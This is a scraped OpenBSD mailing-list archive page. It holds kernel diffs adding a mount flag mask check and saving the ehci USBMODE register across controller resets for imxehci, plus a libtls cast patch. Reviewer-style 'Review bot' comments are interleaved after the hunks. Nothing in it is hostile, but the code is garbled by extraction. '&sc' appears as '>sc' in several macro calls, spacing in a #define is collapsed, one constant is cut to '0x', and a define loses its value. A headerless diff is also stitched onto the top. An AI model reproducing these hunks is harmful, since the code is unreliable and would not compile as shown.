Index: sys/mount.h
===
RCS file: /cvs/src/sys/sys/mount.h,v
retrieving revision 1.127
diff -u -p -r1.127 mount.h
--- sys/mount.h 10 Sep 2016 16:53:30 -  1.127
+++ sys/mount.h 1 Oct 2016 15:36:11 -
@@ -414,6 +414,11 @@ struct mount {
 #define MNT_DOOMED 0x0800  /* device behind filesystem is gone */
 
 /*
+ * All mount flags.
+ */
+#defineMNT_FLAGMASK0x0e0f
+
+/*
  * Flags for various system call interfaces.
  *
  * waitfor flags to vfs_sync() and getfsstat()
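Review bot: MNT_FLAGMASK is a hand-written literal, so the next flag added to this header will be rejected by the new sys_mount() check unless someone remembers to widen the mask. Build the mask by OR-ing the named MNT_* constants, or at minimum extend the "All mount flags" comment to say it must be updated with every new flag.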
Index: kern/vfs_syscalls.c
===
RCS file: /cvs/src/sys/kern/vfs_syscalls.c,v
retrieving revision 1.265
diff -u -p -r1.265 vfs_syscalls.c
--- kern/vfs_syscalls.c 10 Sep 2016 16:53:30 -  1.265
+++ kern/vfs_syscalls.c 1 Oct 2016 15:36:11 -
@@ -117,6 +117,9 @@ sys_mount(struct proc *p, void *v, regis
if ((error = suser(p, 0)))
return (error);
 
+   if (flags & ~MNT_FLAGMASK)
+   return (EINVAL);
+
/*
 * Mount points must fit in MNAMELEN, not MAXPATHLEN.
 */
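Review bot: returning EINVAL for flags & ~MNT_FLAGMASK is a visible change for callers whose unknown bits were previously ignored, and the diff carries no mount(2) manual update. Add the new EINVAL case to the man page in the same commit.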



ehci(4)/imxehci(4) diff to switch port into host mode

2016-10-01 Thread Mark Kettenis
The USB controller on the Freescale i.MX application processors has a
dual role port that can act as device (OTG) or as host.  Since we
don't have any device mode support in our kernel, we try to switch the
port into host mode.  Unfortunately that never worked.  Here's why:

The USBMODE register that controls the mode, gets reset whenever we
reset the controller, i.e. when ehci_reset() gets called.  Since
ehci_init() calls ehci_reset() we lose the host mode setting almost
immediately, and nothing works.

The diff below adds code to save and restore the USBMODE register if
the EHCIF_USBMODE flag is set, and sets this flag in the imxehci(4)
driver.  I also moved the defines for this register to ehcireg.h.
While this isn't a standard EHCI register, it seems that it is present
on many dual-role USB 2.0 controllers.  Allegedly it is part of a
design that ended up being licensed to many other companies.

Note that the register offset changed from 0xa8 to 0x68.  This is not
a bug.  I made the offset relative to the offset given by the
EHCI_CAPLENGTH register.  It is now accessed using EOREAD4/EOWRITE4
instead of EREAD4/EWRITE4.

ok?


Index: arch/armv7/imx/imxehci.c
===
RCS file: /cvs/src/sys/arch/armv7/imx/imxehci.c,v
retrieving revision 1.17
diff -u -p -r1.17 imxehci.c
--- arch/armv7/imx/imxehci.c13 Aug 2016 11:08:58 -  1.17
+++ arch/armv7/imx/imxehci.c1 Oct 2016 13:26:02 -
@@ -58,9 +58,6 @@
 /* ehci */
 #define USB_EHCI_OFFSET0x100
 
-#define EHCI_USBMODE   0xa8
-
-#define EHCI_USBMODE_HOST  (3 << 0)
 #define EHCI_PS_PTS_UTMI_MASK  ((1 << 25) | (3 << 30))
 
 /* usb non-core */
@@ -144,6 +141,7 @@ imxehci_attach(struct device *parent, st
sc->sc.iot = faa->fa_iot;
sc->sc.sc_bus.dmatag = faa->fa_dmat;
sc->sc.sc_size = faa->fa_reg[0].size - USB_EHCI_OFFSET;
+   sc->sc.sc_flags = EHCIF_USBMODE;
 
/* Map I/O space */
if (bus_space_map(sc->sc.iot, faa->fa_reg[0].addr,
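Review bot: sc->sc.sc_flags = EHCIF_USBMODE; in imxehci_attach() overwrites the whole flags word. Use sc->sc.sc_flags |= EHCIF_USBMODE; so a flag set earlier, or added to this driver later, is not silently dropped.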
@@ -247,8 +245,8 @@ imxehci_attach(struct device *parent, st
USBPHY_CTRL_ENUTMILEVEL2 | USBPHY_CTRL_ENUTMILEVEL3);
 
/* set host mode */
-   EWRITE4(>sc, EHCI_USBMODE,
-   EREAD4(>sc, EHCI_USBMODE) | EHCI_USBMODE_HOST);
+   EOWRITE4(>sc, EHCI_USBMODE,
+   EOREAD4(>sc, EHCI_USBMODE) | EHCI_USBMODE_CM_HOST);
 
/* set to UTMI mode */
EOWRITE4(>sc, EHCI_PORTSC(1),
Index: dev/usb/ehci.c
===
RCS file: /cvs/src/sys/dev/usb/ehci.c,v
retrieving revision 1.193
diff -u -p -r1.193 ehci.c
--- dev/usb/ehci.c  15 Sep 2016 02:00:17 -  1.193
+++ dev/usb/ehci.c  1 Oct 2016 13:26:02 -
@@ -1114,7 +1114,7 @@ ehci_activate(struct device *self, int a
 usbd_status
 ehci_reset(struct ehci_softc *sc)
 {
-   u_int32_t hcr;
+   u_int32_t hcr, usbmode;
int i;
 
EOWRITE4(sc, EHCI_USBCMD, 0);   /* Halt controller */
@@ -1128,6 +1128,9 @@ ehci_reset(struct ehci_softc *sc)
if (!hcr)
printf("%s: halt timeout\n", sc->sc_bus.bdev.dv_xname);
 
+   if (sc->sc_flags & EHCIF_USBMODE)
+   usbmode = EOREAD4(sc, EHCI_USBMODE);
+
EOWRITE4(sc, EHCI_USBCMD, EHCI_CMD_HCRESET);
for (i = 0; i < 100; i++) {
usb_delay_ms(>sc_bus, 1);
@@ -1140,6 +1143,9 @@ ehci_reset(struct ehci_softc *sc)
printf("%s: reset timeout\n", sc->sc_bus.bdev.dv_xname);
return (USBD_IOERROR);
}
+
+   if (sc->sc_flags & EHCIF_USBMODE)
+   EOWRITE4(sc, EHCI_USBMODE, usbmode);
 
return (USBD_NORMAL_COMPLETION);
 }
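Review bot: the saved USBMODE value is written back only on the success path; the return (USBD_IOERROR) after "reset timeout" leaves the register in whatever state the incomplete reset produced. If that is intentional, a one-line comment above the restore saying so would help; otherwise restore before the error return as well.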
Index: dev/usb/ehcireg.h
===
RCS file: /cvs/src/sys/dev/usb/ehcireg.h,v
retrieving revision 1.20
diff -u -p -r1.20 ehcireg.h
--- dev/usb/ehcireg.h   10 Apr 2015 13:56:42 -  1.20
+++ dev/usb/ehcireg.h   1 Oct 2016 13:26:02 -
@@ -162,6 +162,13 @@
 
 #define EHCI_PORT_RESET_COMPLETE 2 /* ms */
 
+/* Nonstandard register to set controller mode. */
+#define EHCI_USBMODE   0x68
+#define  EHCI_USBMODE_CM_M 0x0003
+#define  EHCI_USBMODE_CM_IDLE  0x
+#define  EHCI_USBMODE_CM_DEVICE0x0002
+#define  EHCI_USBMODE_CM_HOST  0x0003  
+
 #define EHCI_FLALIGN_ALIGN 0x1000
 
 /* No data structure may cross a page boundary. */
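Review bot: the new comment above EHCI_USBMODE should say that the 0x68 offset is relative to the operational register base used by EOREAD4/EOWRITE4, since the value it replaces in imxehci.c was 0xa8 and the difference is only explained in the mail. The EHCI_USBMODE_CM_HOST line also ends in trailing whitespace.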
Index: dev/usb/ehcivar.h
===
RCS file: /cvs/src/sys/dev/usb/ehcivar.h,v
retrieving revision 1.36
diff -u -p -r1.36 ehcivar.h
--- dev/usb/ehcivar.h   2 Nov 2015 14:55:41 -   1.36
+++ dev/usb/ehcivar.h   1 Oct 2016 13:26:02 -
@@ -130,6 +130,7 @@ struct ehci_softc {
int sc_flags;   /* misc flags */
 #define EHCIF_DROPPED_INTR_WORKAROUND  0x01
 #define EHCIF_PCB_INTR 0x02
+#define EHCIF_USBMODE  

Explicitly cast the return variable in tls_load_file()

2016-10-01 Thread Kinichiro Inoguchi
I would like to cast the return variable explicitly in tls_load_file().
This fix also avoids the Intel C++ compiler "assertion failed" described here.
https://github.com/libressl-portable/portable/issues/209#issuecomment-249587024

ok ?
Index: tls_util.c
===
RCS file: /cvs/src/lib/libtls/tls_util.c,v
retrieving revision 1.3
diff -u -p -r1.3 tls_util.c
--- tls_util.c  9 Sep 2015 19:49:07 -   1.3
+++ tls_util.c  1 Oct 2016 11:30:28 -
@@ -154,7 +154,7 @@ tls_load_file(const char *name, size_t *
 
  done:
*len = size;
-   return (buf);
+   return ((uint8_t *)buf);
 
  fail:
free(buf);
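Review bot: the cast in return ((uint8_t *)buf); only has an effect if buf is not already declared uint8_t *, and the hunk does not show the declaration. If the types already match, the change is purely a workaround for the compiler issue linked in the mail and should carry a comment saying so; if they differ, fixing the declaration is cleaner than casting at the return.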